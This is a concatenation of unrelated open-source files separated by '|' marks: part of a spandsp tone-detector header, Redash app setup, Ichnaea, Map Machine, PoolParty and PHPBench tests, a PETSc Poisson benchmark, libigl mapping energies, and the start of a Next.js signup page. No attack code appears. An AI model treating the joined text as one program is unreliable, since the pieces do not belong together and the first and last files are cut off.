\return The supervisory tone set descriptor.
*/
SPAN_DECLARE(super_tone_rx_descriptor_t *) super_tone_rx_make_descriptor(super_tone_rx_descriptor_t *desc);
/*! Free a supervisory tone detector descriptor.
\param desc The supervisory tone set desciptor.
\return 0 for OK, -1 for fail.
*/
SPAN_DECLARE(int) super_tone_rx_free_descriptor(super_tone_rx_descriptor_t *desc);
/*! Add a new tone pattern to a supervisory tone detector set.
\param desc The supervisory tone set descriptor.
\return The new tone ID. */
SPAN_DECLARE(int) super_tone_rx_add_tone(super_tone_rx_descriptor_t *desc);
/*! Add a new tone pattern element to a tone pattern in a supervisory tone detector.
\param desc The supervisory tone set desciptor.
\param tone The tone ID within the descriptor.
\param f1 Frequency 1 (-1 for a silent period).
\param f2 Frequency 2 (-1 for a silent period, or only one frequency).
\param min The minimum duration, in ms.
\param max The maximum duration, in ms.
\return The new number of elements in the tone description.
*/
SPAN_DECLARE(int) super_tone_rx_add_element(super_tone_rx_descriptor_t *desc,
int tone,
int f1,
int f2,
int min,
int max);
/*! Initialise a supervisory tone detector.
\param s The supervisory tone detector context.
\param desc The tone descriptor.
\param callback The callback routine called to report the valid detection or termination of
one of the monitored tones.
\param user_data An opaque pointer passed when calling the callback routine.
\return The supervisory tone detector context.
*/
SPAN_DECLARE(super_tone_rx_state_t *) super_tone_rx_init(super_tone_rx_state_t *s,
super_tone_rx_descriptor_t *desc,
tone_report_func_t callback,
void *user_data);
/*! Release a supervisory tone detector.
\param s The supervisory tone context.
\return 0 for OK, -1 for fail.
*/
SPAN_DECLARE(int) super_tone_rx_release(super_tone_rx_state_t *s);
/*! Free a supervisory tone detector.
\param s The supervisory tone context.
\return 0 for OK, -1 for fail.
*/
SPAN_DECLARE(int) super_tone_rx_free(super_tone_rx_state_t *s);
/*! Define a callback routine to be called each time a tone pattern element is complete. This is
mostly used when analysing a tone.
\param s The supervisory tone context.
\param callback The callback routine.
*/
SPAN_DECLARE(void) super_tone_rx_segment_callback(super_tone_rx_state_t *s,
void (*callback)(void *data, int f1, int f2, int duration));
/*! Apply supervisory tone detection processing to a block of audio samples.
\brief Apply supervisory tone detection processing to a block of audio samples.
\param super The supervisory tone context.
\param amp The audio sample buffer.
\param samples The number of samples in the buffer.
\return The number of samples processed.
*/
SPAN_DECLARE(int) super_tone_rx(super_tone_rx_state_t *super, const int16_t amp[], int samples);
#if defined(__cplusplus)
}
#endif
#endif
/*- End of file ------------------------------------------------------------*/
|
import sys
import logging
import urlparse
import urllib
import redis
from flask import Flask, current_app
from flask_sslify import SSLify
from werkzeug.contrib.fixers import ProxyFix
from werkzeug.routing import BaseConverter
from statsd import StatsClient
from flask_mail import Mail
from flask_limiter import Limiter
from flask_limiter.util import get_ipaddr
from flask_migrate import Migrate
from redash import settings
from redash.query_runner import import_query_runners
from redash.destinations import import_destinations
__version__ = '7.0.0-beta'
import os
if os.environ.get("REMOTE_DEBUG"):
import ptvsd
ptvsd.enable_attach(address=('0.0.0.0', 5678))
def setup_logging():
handler = logging.StreamHandler(sys.stdout if settings.LOG_STDOUT else sys.stderr)
formatter = logging.Formatter(settings.LOG_FORMAT)
handler.setFormatter(formatter)
logging.getLogger().addHandler(handler)
logging.getLogger().setLevel(settings.LOG_LEVEL)
# Make noisy libraries less noisy
if settings.LOG_LEVEL != "DEBUG":
logging.getLogger("passlib").setLevel("ERROR")
logging.getLogger("requests.packages.urllib3").setLevel("ERROR")
logging.getLogger("snowflake.connector").setLevel("ERROR")
logging.getLogger('apiclient').setLevel("ERROR")
def create_redis_connection():
logging.debug("Creating Redis connection (%s)", settings.REDIS_URL)
redis_url = urlparse.urlparse(settings.REDIS_URL)
if redis_url.scheme == 'redis+socket':
qs = urlparse.parse_qs(redis_url.query)
if 'virtual_host' in qs:
db = qs['virtual_host'][0]
else:
db = 0
client = redis.StrictRedis(unix_socket_path=redis_url.path, db=db)
else:
if redis_url.path:
redis_db = redis_url.path[1]
else:
redis_db = 0
# Redis passwords might be quoted with special characters
redis_password = redis_url.password and urllib.unquote(redis_url.password)
client = redis.StrictRedis(host=redis_url.hostname, port=redis_url.port, db=redis_db, password=redis_password)
return client
setup_logging()
redis_connection = create_redis_connection()
mail = Mail()
migrate = Migrate()
mail.init_mail(settings.all_settings())
statsd_client = StatsClient(host=settings.STATSD_HOST, port=settings.STATSD_PORT, prefix=settings.STATSD_PREFIX)
limiter = Limiter(key_func=get_ipaddr, storage_uri=settings.LIMITER_STORAGE)
import_query_runners(settings.QUERY_RUNNERS)
import_destinations(settings.DESTINATIONS)
from redash.version_check import reset_new_version_status
reset_new_version_status()
class SlugConverter(BaseConverter):
def to_python(self, value):
# This is ay workaround for when we enable multi-org and some files are being called by the index rule:
# for path in settings.STATIC_ASSETS_PATHS:
# full_path = safe_join(path, value)
# if os.path.isfile(full_path):
# raise ValidationError()
return value
def to_url(self, value):
return value
def create_app():
from redash import authentication, extensions, handlers
from redash.handlers.webpack import configure_webpack
from redash.handlers import chrome_logger
from redash.models import db, users
from redash.metrics.request import provision_app
from redash.utils import sentry
sentry.init()
app = Flask(__name__,
template_folder=settings.STATIC_ASSETS_PATH,
static_folder=settings.STATIC_ASSETS_PATH,
static_path='/static')
# Make sure we get the right referral address even behind proxies like nginx.
app.wsgi_app = ProxyFix(app.wsgi_app, settings.PROXIES_COUNT)
app.url_map.converters['org_slug'] = SlugConverter
if settings.ENFORCE_HTTPS:
SSLify(app, skips=['ping'])
# configure our database
app.config['SQLALCHEMY_DATABASE_URI'] = settings.SQLALCHEMY_DATABASE_URI
app.config.update(settings.all_settings())
provision_app(app)
db.init_app(app)
migrate.init_app(app, db)
mail.init_app(app)
authentication.init_app(app)
limiter.init_app(app)
handlers.init_app(app)
configure_webpack(app)
extensions.init_extensions(app)
chrome_logger.init_app(app)
users.init_app(app)
return app
|
from datetime import timedelta
from random import randint
from ichnaea.data.tasks import (
monitor_api_key_limits,
monitor_api_users,
monitor_queue_size,
)
from ichnaea import util
class TestMonitor(object):
def test_monitor_api_keys_empty(self, celery, stats):
monitor_api_key_limits.delay().get()
stats.check(gauge=[('api.limit', 0)])
def test_monitor_api_keys_one(self, celery, redis, stats):
today = util.utcnow().strftime('%Y%m%d')
rate_key = 'apilimit:no_key_1:v1.geolocate:' + today
redis.incr(rate_key, 13)
monitor_api_key_limits.delay().get()
stats.check(gauge=[
('api.limit', ['key:no_key_1', 'path:v1.geolocate']),
])
def test_monitor_api_keys_multiple(self, celery, redis, stats):
now = util.utcnow()
today = now.strftime('%Y%m%d')
yesterday = (now - timedelta(hours=24)).strftime('%Y%m%d')
data = {
'test': {'v1.search': 11, 'v1.geolocate': 13},
'no_key_1': {'v1.search': 12},
'no_key_2': {'v1.geolocate': 15},
}
for key, paths in data.items():
for path, value in paths.items():
rate_key = 'apilimit:%s:%s:%s' % (key, path, today)
redis.incr(rate_key, value)
rate_key = 'apilimit:%s:%s:%s' % (key, path, yesterday)
redis.incr(rate_key, value - 10)
# add some other items into Redis
redis.lpush('default', 1, 2)
redis.set('cache_something', '{}')
monitor_api_key_limits.delay().get()
stats.check(gauge=[
('api.limit', ['key:test', 'path:v1.geolocate']),
('api.limit', ['key:test', 'path:v1.search']),
('api.limit', ['key:no_key_1', 'path:v1.search']),
('api.limit', ['key:no_key_2', 'path:v1.geolocate']),
])
def test_monitor_queue_size(self, celery, redis, stats):
data = {
'export_queue_internal': 3,
'export_queue_backup:abcd-ef-1234': 7,
}
for name in celery.all_queues:
data[name] = randint(1, 10)
for k, v in data.items():
redis.lpush(k, *range(v))
monitor_queue_size.delay().get()
stats.check(
gauge=[('queue', 1, v, ['queue:' + k]) for k, v in data.items()])
class TestMonitorAPIUsers(object):
@property
def today(self):
return util.utcnow().date()
@property
def today_str(self):
return self.today.strftime('%Y-%m-%d')
def test_empty(self, celery, stats):
monitor_api_users.delay().get()
stats.check(gauge=[('submit.user', 0), ('locate.user', 0)])
def test_one_day(self, celery, geoip_data, redis, stats):
bhutan_ip = geoip_data['Bhutan']['ip']
london_ip = geoip_data['London']['ip']
redis.pfadd(
'apiuser:submit:test:' + self.today_str, bhutan_ip, london_ip)
redis.pfadd(
'apiuser:submit:valid_key:' + self.today_str, bhutan_ip)
redis.pfadd(
'apiuser:locate:valid_key:' + self.today_str, bhutan_ip)
monitor_api_users.delay().get()
stats.check(gauge=[
('submit.user', 1, 2, ['key:test', 'interval:1d']),
('submit.user', 1, 2, ['key:test', 'interval:7d']),
('submit.user', 1, 1, ['key:valid_key', 'interval:1d']),
('submit.user', 1, 1, ['key:valid_key', 'interval:7d']),
('locate.user', 1, 1, ['key:valid_key', 'interval:1d']),
('locate.user', 1, 1, ['key:valid_key', 'interval:7d']),
])
def test_many_days(self, celery, geoip_data, redis, stats):
bhutan_ip = geoip_data['Bhutan']['ip']
london_ip = geoip_data['London']['ip']
days_6 = (self.today - timedelta(days=6)).strftime('%Y-%m-%d')
days_7 = (self.today - timedelta(days=7)).strftime('%Y-%m-%d')
redis.pfadd(
'apiuser:submit:test:' + self.today_str, '127.0.0.1', bhutan_ip)
# add the same IPs + one new one again
redis.pfadd(
'apiuser:submit:test:' + days_6, '127.0.0.1', bhutan_ip, london_ip)
# add one entry which is too old
redis.pfadd(
'apiuser:submit:test:' + days_7, bhutan_ip)
monitor_api_users.delay().get()
stats.check(gauge=[
('submit.user', 1, 2, ['key:test', 'interval:1d']),
# we count unique IPs over the entire 7 day period,
# so it's just 3 uniques
('submit.user', 1, 3, ['key:test', 'interval:7d']),
])
# the too old key was deleted manually
assert not redis.exists('apiuser:submit:test:' + days_7)
|
"""
Test command line commands.
"""
from pathlib import Path
from subprocess import PIPE, Popen
__author__ = "Sergey Vartanov"
__email__ = "[email protected]"
from xml.etree import ElementTree
from xml.etree.ElementTree import Element
from map_machine.ui.cli import COMMAND_LINES
LOG: bytes = (
b"INFO Constructing ways...\n"
b"INFO Constructing nodes...\n"
b"INFO Drawing ways...\n"
b"INFO Drawing main icons...\n"
b"INFO Drawing extra icons...\n"
b"INFO Drawing texts...\n"
)
def error_run(arguments: list[str], message: bytes) -> None:
"""Run command that should fail and check error message."""
with Popen(["map-machine"] + arguments, stderr=PIPE) as pipe:
_, error = pipe.communicate()
assert pipe.returncode != 0
assert error == message
def run(arguments: list[str], message: bytes) -> None:
"""Run command that should fail and check error message."""
with Popen(["map-machine"] + arguments, stderr=PIPE) as pipe:
_, error = pipe.communicate()
assert pipe.returncode == 0
assert error == message
def test_wrong_render_arguments() -> None:
"""Test `render` command with wrong arguments."""
error_run(
["render", "-z", "17"],
b"CRITICAL Specify either --input, or --boundary-box, or --coordinates "
b"and --size.\n",
)
def test_render() -> None:
"""Test `render` command."""
run(
COMMAND_LINES["render"] + ["--cache", "tests/data"],
LOG + b"INFO Writing output SVG to out/map.svg...\n",
)
with Path("out/map.svg").open(encoding="utf-8") as output_file:
root: Element = ElementTree.parse(output_file).getroot()
# 4 expected elements: `defs`, `rect` (background), `g` (outline),
# `g` (icon), 4 `text` elements (credits).
assert len(root) == 8
assert len(root[3][0]) == 0
assert root.get("width") == "186.0"
assert root.get("height") == "198.0"
def test_render_with_tooltips() -> None:
"""Test `render` command."""
run(
COMMAND_LINES["render_with_tooltips"] + ["--cache", "tests/data"],
LOG + b"INFO Writing output SVG to out/map.svg...\n",
)
with Path("out/map.svg").open(encoding="utf-8") as output_file:
root: Element = ElementTree.parse(output_file).getroot()
# 4 expected elements: `defs`, `rect` (background), `g` (outline),
# `g` (icon), 4 `text` elements (credits).
assert len(root) == 8
assert len(root[3][0]) == 1
assert root[3][0][0].text == "natural: tree"
assert root.get("width") == "186.0"
assert root.get("height") == "198.0"
def test_icons() -> None:
"""Test `icons` command."""
run(
COMMAND_LINES["icons"],
b"INFO Icons are written to out/icons_by_name and out/icons_by_id.\n"
b"INFO Icon grid is written to out/icon_grid.svg.\n"
b"INFO Icon grid is written to doc/grid.svg.\n",
)
assert (Path("out") / "icon_grid.svg").is_file()
assert (Path("out") / "icons_by_name").is_dir()
assert (Path("out") / "icons_by_id").is_dir()
assert (Path("out") / "icons_by_name" / "Röntgen apple.svg").is_file()
assert (Path("out") / "icons_by_id" / "apple.svg").is_file()
def test_mapcss() -> None:
"""Test `mapcss` command."""
run(
COMMAND_LINES["mapcss"],
b"INFO MapCSS 0.2 scheme is written to out/map_machine_mapcss.\n",
)
assert (Path("out") / "map_machine_mapcss").is_dir()
assert (Path("out") / "map_machine_mapcss" / "icons").is_dir()
assert (
Path("out") / "map_machine_mapcss" / "icons" / "apple.svg"
).is_file()
assert (Path("out") / "map_machine_mapcss" / "map_machine.mapcss").is_file()
def test_element() -> None:
"""Test `element` command."""
run(
COMMAND_LINES["element"],
b"INFO Element is written to out/element.svg.\n",
)
assert (Path("out") / "element.svg").is_file()
def test_tile() -> None:
"""Test `tile` command."""
run(
COMMAND_LINES["tile"] + ["--cache", "tests/data"],
LOG + b"INFO Tile is drawn to out/tiles/tile_18_160199_88904.svg.\n"
b"INFO SVG file is rasterized to out/tiles/tile_18_160199_88904.png.\n",
)
assert (Path("out") / "tiles" / "tile_18_160199_88904.svg").is_file()
assert (Path("out") / "tiles" / "tile_18_160199_88904.png").is_file()
|
require File.dirname(__FILE__) + '/../../spec_helper'
# include Remote
class TestEC2Class
include PoolParty::Remote::RemoterBase
include Ec2
include CloudResourcer
include CloudDsl
def keypair
"fake_keypair"
end
def ami;"ami-abc123";end
def size; "small";end
def security_group; "default";end
def ebs_volume_id; "ebs_volume_id";end
def availabilty_zone; "us-east-1a";end
def verbose
false
end
def ec2
@ec2 ||= EC2::Base.new( :access_key_id => "not_an_access_key", :secret_access_key => "not_a_secret_access_key")
end
end
describe "ec2 remote base" do
before(:each) do
setup
@tr = TestEC2Class.new
stub_remoter_for(@tr)
@tr.stub!(:get_instances_description).and_return response_list_of_instances
end
%w(launch_new_instance! terminate_instance! describe_instance describe_instances create_snapshot).each do |method|
eval <<-EOE
it "should have the method #{method}" do
@tr.respond_to?(:#{method}).should == true
end
EOE
end
describe "helpers" do
it "should be able to convert an ec2 ip to a real ip" do
"ec2-72-44-36-12.compute-1.amazonaws.com".convert_from_ec2_to_ip.should == "72.44.36.12"
end
it "should not throw an error if another string is returned" do
"72.44.36.12".convert_from_ec2_to_ip.should == "72.44.36.12"
end
it "should be able to parse the date from the timestamp" do
"2008-11-13T09:33:09+0000".parse_datetime.should == DateTime.parse("2008-11-13T09:33:09+0000")
end
it "should rescue itself and just return the string if it fails" do
"thisisthedate".parse_datetime.should == "thisisthedate"
end
end
describe "launching" do
before(:each) do
@tr.ec2.stub!(:run_instances).and_return true
end
it "should call run_instances on the ec2 Base class when asking to launch_new_instance!" do
@tr.ec2.should_receive(:run_instances).and_return true
@tr.launch_new_instance!
end
it "should use a specific security group if one is specified" do
@tr.stub!(:security_group).and_return "web"
@tr.ec2.should_receive(:run_instances).with(hash_including(:group_id => ['web'])).and_return true
@tr.launch_new_instance!
end
it "should use the default security group if none is specified" do
@tr.ec2.should_receive(:run_instances).with(hash_including(:group_id => ['default'])).and_return true
@tr.launch_new_instance!
end
it "should get the hash response from EC2ResponseObject" do
EC2ResponseObject.should_receive(:get_hash_from_response).and_return true
@tr.launch_new_instance!
end
end
describe "terminating" do
it "should call terminate_instance! on ec2 when asking to terminate_instance!" do
@tr.ec2.should_receive(:terminate_instances).with(:instance_id => "abc-123").and_return true
@tr.terminate_instance!("abc-123")
end
end
describe "describe_instance" do
it "should call get_instances_description on itself" do
@tr.should_receive(:get_instances_description).and_return {}
@tr.describe_instance
end
end
describe "get_instances_description" do
it "should return a hash" do
@tr.describe_instances.class.should == Array
end
it "should call the first node master" do
@tr.describe_instances.first[:name].should == "master"
end
it "should call the second one node1" do
@tr.describe_instances[1][:name].should == "node1"
end
it "should call the third node2" do
@tr.describe_instances[2][:name].should == "terminated_node2"
end
end
describe "create_keypair" do
before(:each) do
Kernel.stub!(:system).with("ec2-add-keypair fake_keypair > #{Base.base_keypair_path}/id_rsa-fake_keypair && chmod 600 #{Base.base_keypair_path}/id_rsa-fake_keypair").and_return true
end
it "should send system to the Kernel" do
Kernel.should_receive(:system).with("ec2-add-keypair fake_keypair > #{Base.base_keypair_path}/id_rsa-fake_keypair && chmod 600 #{Base.base_keypair_path}/id_rsa-fake_keypair").and_return true
@tr.create_keypair
end
it "should try to create the directory when making a new keypair" do
FileUtils.should_receive(:mkdir_p).and_return true
::File.stub!(:directory?).and_return false
@tr.create_keypair
end
it "should not create a keypair if the keypair is nil" do
Kernel.should_not_receive(:system)
@tr.stub!(:keypair).and_return nil
@tr.create_keypair
end
end
describe "create_snapshot" do
# We can assume that create_snapshot on the ec2 gem works
before(:each) do
@tr.ec2.stub!(:create_snapshot).and_return nil
end
it "should create a snapshot of the current EBS volume" do
@tr.ec2.stub!(:create_snapshot).and_return {{"snapshotId" => "snap-123"}}
@tr.stub!(:ebs_volume_id).and_return "vol-123"
@tr.create_snapshot.should == {"snapshotId" => "snap-123"}
end
it "should not create a snapshot if there is no EBS volume" do
@tr.create_snapshot.should == nil
end
end
end |
/**
* \file main.cpp
* \brief An example and benchmark of AmgX and PETSc with Poisson system.
*
* The Poisson equation we solve here is
* \nabla^2 u(x, y) = -8\pi^2 \cos{2\pi x} \cos{2\pi y}
* for 2D. And
* \nabla^2 u(x, y, z) = -12\pi^2 \cos{2\pi x} \cos{2\pi y} \cos{2\pi z}
* for 3D.
*
* The exact solutions are
* u(x, y) = \cos{2\pi x} \cos{2\pi y}
* for 2D. And
* u(x, y, z) = \cos{2\pi x} \cos{2\pi y} \cos{2\pi z}
* for 3D.
*
* \author Pi-Yueh Chuang ([email protected])
* \date 2017-06-26
*/
// PETSc
# include <petsctime.h>
# include <petscsys.h>
# include <petscmat.h>
# include <petscvec.h>
# include <petscksp.h>
// headers
# include "helper.h"
// constants
# define Nx -100
# define Ny -100
# define Nz -100
int main(int argc, char **argv)
{
PetscErrorCode ierr; // error codes returned by PETSc routines
DM da; // DM object
DMDALocalInfo info; // partitioning info
Vec lhs, // left hand side
rhs, // right hand side
exact; // exact solution
Mat A; // coefficient matrix
KSP ksp; // PETSc KSP solver instance
KSPConvergedReason reason; // KSP convergence/divergence reason
PetscInt Niters; // iterations used to converge
PetscReal res, // final residual
Linf; // maximum norm
PetscLogDouble start, // time at the begining
initSys, // time after init the sys
initSolver, // time after init the solver
solve; // time after solve
char config[PETSC_MAX_PATH_LEN]; // config file name
// initialize MPI and PETSc
ierr = MPI_Init(&argc, &argv); CHKERRQ(ierr);
ierr = PetscInitialize(&argc, &argv, nullptr, nullptr); CHKERRQ(ierr);
// allow PETSc to read run-time options from a file
ierr = PetscOptionsGetString(nullptr, nullptr, "-config",
config, PETSC_MAX_PATH_LEN, nullptr); CHKERRQ(ierr);
ierr = PetscOptionsInsertFile(PETSC_COMM_WORLD,
nullptr, config, PETSC_FALSE); CHKERRQ(ierr);
// get time
ierr = PetscTime(&start); CHKERRQ(ierr);
// prepare the linear system
ierr = createSystem(Nx, Ny, Nz, da, A, lhs, rhs, exact); CHKERRQ(ierr);
// get system info
ierr = DMDAGetLocalInfo(da, &info); CHKERRQ(ierr);
// get time
ierr = PetscTime(&initSys); CHKERRQ(ierr);
// create a solver
ierr = KSPCreate(PETSC_COMM_WORLD, &ksp); CHKERRQ(ierr);
ierr = KSPSetOperators(ksp, A, A); CHKERRQ(ierr);
ierr = KSPSetType(ksp, KSPCG); CHKERRQ(ierr);
ierr = KSPSetReusePreconditioner(ksp, PETSC_TRUE); CHKERRQ(ierr);
ierr = KSPSetFromOptions(ksp); CHKERRQ(ierr);
ierr = KSPSetUp(ksp); CHKERRQ(ierr);
// get time
ierr = PetscTime(&initSolver); CHKERRQ(ierr);
// solve the system
ierr = KSPSolve(ksp, rhs, lhs); CHKERRQ(ierr);
// get time
ierr = PetscTime(&solve); CHKERRQ(ierr);
// check if the solver converged
ierr = KSPGetConvergedReason(ksp, &reason); CHKERRQ(ierr);
if (reason < 0) SETERRQ1(PETSC_COMM_WORLD,
PETSC_ERR_CONV_FAILED, "Diverger reason: %d\n", reason);
// get the number of iterations
ierr = KSPGetIterationNumber(ksp, &Niters); CHKERRQ(ierr);
// get the L2 norm of final residual
ierr = KSPGetResidualNorm(ksp, &res);
// calculate error norm (maximum norm)
ierr = VecAXPY(lhs, -1.0, exact); CHKERRQ(ierr);
ierr = VecNorm(lhs, NORM_INFINITY, &Linf); CHKERRQ(ierr);
// print result
ierr = PetscPrintf(PETSC_COMM_WORLD,
"[Nx, Ny, Nz]: [%d, %d, %d]\n" "Number of iterations: %d\n"
"L2 norm of final residual: %f\n" "Maximum norm of error: %f\n"
"Time [init, create solver, solve]: [%f, %f, %f]\n",
info.mx, info.my, info.mz, Niters, res, Linf,
initSys-start, initSolver-initSys, solve-initSolver); CHKERRQ(ierr);
// destroy KSP solver
ierr = KSPDestroy(&ksp); CHKERRQ(ierr);
// destroy the linear system
ierr = destroySystem(da, A, lhs, rhs, exact); CHKERRQ(ierr);
// finalize PETSc and MPI
ierr = PetscFinalize(); CHKERRQ(ierr);
ierr = MPI_Finalize(); CHKERRQ(ierr);
return ierr;
}
|
<?php
/*
* This file is part of the PHPBench package
*
* (c) Daniel Leech <[email protected]>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*
*/
namespace PhpBench\Tests\Unit\Progress\Logger;
use PhpBench\Model\Benchmark;
use PhpBench\Model\Iteration;
use PhpBench\Model\ParameterSet;
use PhpBench\Model\Subject;
use PhpBench\Model\Variant;
use PhpBench\Progress\Logger\HistogramLogger;
use PhpBench\Tests\Util\TestUtil;
use PhpBench\Util\TimeUnit;
use PHPUnit\Framework\TestCase;
use Symfony\Component\Console\Output\BufferedOutput;
class HistogramLoggerTest extends TestCase
{
public function setUp()
{
$this->output = new BufferedOutput();
$this->timeUnit = new TimeUnit(TimeUnit::MICROSECONDS, TimeUnit::MILLISECONDS);
$this->logger = new HistogramLogger($this->timeUnit);
$this->logger->setOutput($this->output);
$this->benchmark = $this->prophesize(Benchmark::class);
$this->subject = $this->prophesize(Subject::class);
$this->iteration = $this->prophesize(Iteration::class);
$this->variant = new Variant(
$this->subject->reveal(),
new ParameterSet(),
1,
0
);
$this->variant->spawnIterations(4);
$this->benchmark->getSubjects()->willReturn([
$this->subject->reveal(),
]);
$this->benchmark->getClass()->willReturn('BenchmarkTest');
$this->subject->getName()->willReturn('benchSubject');
$this->subject->getIndex()->willReturn(1);
$this->subject->getOutputTimeUnit()->willReturn('milliseconds');
$this->subject->getOutputMode()->willReturn('time');
$this->subject->getRetryThreshold()->willReturn(10);
$this->subject->getOutputTimePrecision()->willReturn(3);
}
/**
* It should show the benchmark name and list all of the subjects.
*/
public function testBenchmarkStart()
{
$this->logger->benchmarkStart($this->benchmark->reveal());
$display = $this->output->fetch();
$this->assertContains('BenchmarkTest', $display);
$this->assertContains('#1 benchSubject', $display);
}
/**
* Test iteration start.
*/
public function testIterationStart()
{
$this->iteration->getIndex()->willReturn(1);
$this->iteration->getVariant()->willReturn($this->variant);
$this->logger->iterationStart($this->iteration->reveal());
$display = $this->output->fetch();
$this->assertContains('it 1/4', $display);
}
/**
* It should show information at the start of the variant.
*/
public function testIterationsStart()
{
$this->logger->variantStart($this->variant);
$display = $this->output->fetch();
$this->assertContains(
'1 (σ = 0.000ms ) -2σ [ ] +2σ',
$display
);
$this->assertContains(
'benchSubject',
$display
);
$this->assertContains(
'parameters []',
$display
);
}
/**
* It should show an error if the iteration has an exception.
*/
public function testIterationException()
{
$this->variant->setException(new \Exception('foo'));
$this->logger->variantEnd($this->variant);
$this->assertContains('ERROR', $this->output->fetch());
}
/**
* It should show the histogram and statistics when an iteration is
* completed (and there were no rejections).
*/
public function testIterationEnd()
{
foreach ($this->variant as $iteration) {
foreach (TestUtil::createResults(10, 10) as $result) {
$iteration->setResult($result);
}
}
$this->variant->computeStats();
$this->logger->variantEnd($this->variant);
$display = $this->output->fetch();
$this->assertContains(
'1 (σ = 0.000ms ) -2σ [ █ ] +2σ [μ Mo]/r: 0.010 0.010 μRSD/r: 0.00%',
$display
);
}
}
|
// This file is part of libigl, a simple c++ geometry processing library.
//
// Copyright (C) 2018 Zhongshi Jiang <[email protected]>
//
// This Source Code Form is subject to the terms of the Mozilla Public License
// v. 2.0. If a copy of the MPL was not distributed with this file, You can
// obtain one at http://mozilla.org/MPL/2.0/.
#include "mapping_energy_with_jacobians.h"
#include "polar_svd.h"
IGL_INLINE double igl::mapping_energy_with_jacobians(
const Eigen::MatrixXd &Ji,
const Eigen::VectorXd &areas,
igl::MappingEnergyType slim_energy,
double exp_factor){
double energy = 0;
if (Ji.cols() == 4)
{
Eigen::Matrix<double, 2, 2> ji;
for (int i = 0; i < Ji.rows(); i++)
{
ji(0, 0) = Ji(i, 0);
ji(0, 1) = Ji(i, 1);
ji(1, 0) = Ji(i, 2);
ji(1, 1) = Ji(i, 3);
typedef Eigen::Matrix<double, 2, 2> Mat2;
typedef Eigen::Matrix<double, 2, 1> Vec2;
Mat2 ri, ti, ui, vi;
Vec2 sing;
igl::polar_svd(ji, ri, ti, ui, sing, vi);
double s1 = sing(0);
double s2 = sing(1);
switch (slim_energy)
{
case igl::MappingEnergyType::ARAP:
{
energy += areas(i) * (pow(s1 - 1, 2) + pow(s2 - 1, 2));
break;
}
case igl::MappingEnergyType::SYMMETRIC_DIRICHLET:
{
energy += areas(i) * (pow(s1, 2) + pow(s1, -2) + pow(s2, 2) + pow(s2, -2));
break;
}
case igl::MappingEnergyType::EXP_SYMMETRIC_DIRICHLET:
{
energy += areas(i) * exp(exp_factor * (pow(s1, 2) + pow(s1, -2) + pow(s2, 2) + pow(s2, -2)));
break;
}
case igl::MappingEnergyType::LOG_ARAP:
{
energy += areas(i) * (pow(log(s1), 2) + pow(log(s2), 2));
break;
}
case igl::MappingEnergyType::CONFORMAL:
{
energy += areas(i) * ((pow(s1, 2) + pow(s2, 2)) / (2 * s1 * s2));
break;
}
case igl::MappingEnergyType::EXP_CONFORMAL:
{
energy += areas(i) * exp(exp_factor * ((pow(s1, 2) + pow(s2, 2)) / (2 * s1 * s2)));
break;
}
}
}
}
else
{
Eigen::Matrix<double, 3, 3> ji;
for (int i = 0; i < Ji.rows(); i++)
{
ji(0, 0) = Ji(i, 0);
ji(0, 1) = Ji(i, 1);
ji(0, 2) = Ji(i, 2);
ji(1, 0) = Ji(i, 3);
ji(1, 1) = Ji(i, 4);
ji(1, 2) = Ji(i, 5);
ji(2, 0) = Ji(i, 6);
ji(2, 1) = Ji(i, 7);
ji(2, 2) = Ji(i, 8);
typedef Eigen::Matrix<double, 3, 3> Mat3;
typedef Eigen::Matrix<double, 3, 1> Vec3;
Mat3 ri, ti, ui, vi;
Vec3 sing;
igl::polar_svd(ji, ri, ti, ui, sing, vi);
double s1 = sing(0);
double s2 = sing(1);
double s3 = sing(2);
switch (slim_energy)
{
case igl::MappingEnergyType::ARAP:
{
energy += areas(i) * (pow(s1 - 1, 2) + pow(s2 - 1, 2) + pow(s3 - 1, 2));
break;
}
case igl::MappingEnergyType::SYMMETRIC_DIRICHLET:
{
energy += areas(i) * (pow(s1, 2) + pow(s1, -2) + pow(s2, 2) + pow(s2, -2) + pow(s3, 2) + pow(s3, -2));
break;
}
case igl::MappingEnergyType::EXP_SYMMETRIC_DIRICHLET:
{
energy += areas(i) * exp(exp_factor *
(pow(s1, 2) + pow(s1, -2) + pow(s2, 2) + pow(s2, -2) + pow(s3, 2) + pow(s3, -2)));
break;
}
case igl::MappingEnergyType::LOG_ARAP:
{
energy += areas(i) * (pow(log(s1), 2) + pow(log(std::abs(s2)), 2) + pow(log(std::abs(s3)), 2));
break;
}
case igl::MappingEnergyType::CONFORMAL:
{
energy += areas(i) * ((pow(s1, 2) + pow(s2, 2) + pow(s3, 2)) / (3 * pow(s1 * s2 * s3, 2. / 3.)));
break;
}
case igl::MappingEnergyType::EXP_CONFORMAL:
{
energy += areas(i) * exp((pow(s1, 2) + pow(s2, 2) + pow(s3, 2)) / (3 * pow(s1 * s2 * s3, 2. / 3.)));
break;
}
}
}
}
return energy;
}
#ifdef IGL_STATIC_LIBRARY
// Explicit template instantiation
#endif
|
import type { CustomNextPage } from "next";
import { useState } from "react";
import { useForm } from "react-hook-form";
import { useManageAccount } from "src/hook/vendor/useManageAccount";
import { Layout } from "src/layout";
import {
Attention,
InputLayout,
InputType,
} from "src/pages/vendor/auth/component";
import type {
TypeEmail,
TypeRadio,
TypeSelect,
TypeTel,
TypeText,
TypeTextarea,
TypeUrl,
} from "src/type/vendor";
import type Stripe from "stripe";
const inputItems: (
| TypeEmail
| TypeRadio
| TypeSelect
| TypeTel
| TypeText
| TypeUrl
| TypeTextarea
)[] = [
// {
// id: "business_type",
// label: "事業形態",
// type: "radio",
// radioItem: [{ id: "individual" }, { id: "company" }, { id: "non_profit" }],
// },
// {
// id: "first_name_kanji",
// label: "氏名",
// type: "text",
// placeholder: "姓",
// },
// {
// id: "last_name_kanji",
// label: "氏名",
// type: "text",
// placeholder: "名",
// },
// {
// id: "first_name_kana",
// label: "氏名(かな)",
// type: "text",
// placeholder: "姓",
// },
// {
// id: "last_name_kana",
// label: "氏名(かな)",
// type: "text",
// placeholder: "名",
// },
{
id: "email",
label: "メールアドレス",
type: "email",
autoComplete: "email",
placeholder: "[email protected]",
},
// {
// id: "businessProfileMcc",
// label: "事業カテゴリー",
// type: "select",
// selectItem: [
// { value: "", text: "選んでください。" },
// { value: "Dog", text: "Dog" },
// { value: "Cat", text: "Cat" },
// { value: "Bird", text: "Bird" },
// ],
// },
// {
// id: "businessProfileProductDescription",
// label: "事業詳細",
// type: "textarea",
// },
];
const Create: CustomNextPage = () => {
const [isLoading, setIsLoading] = useState(false);
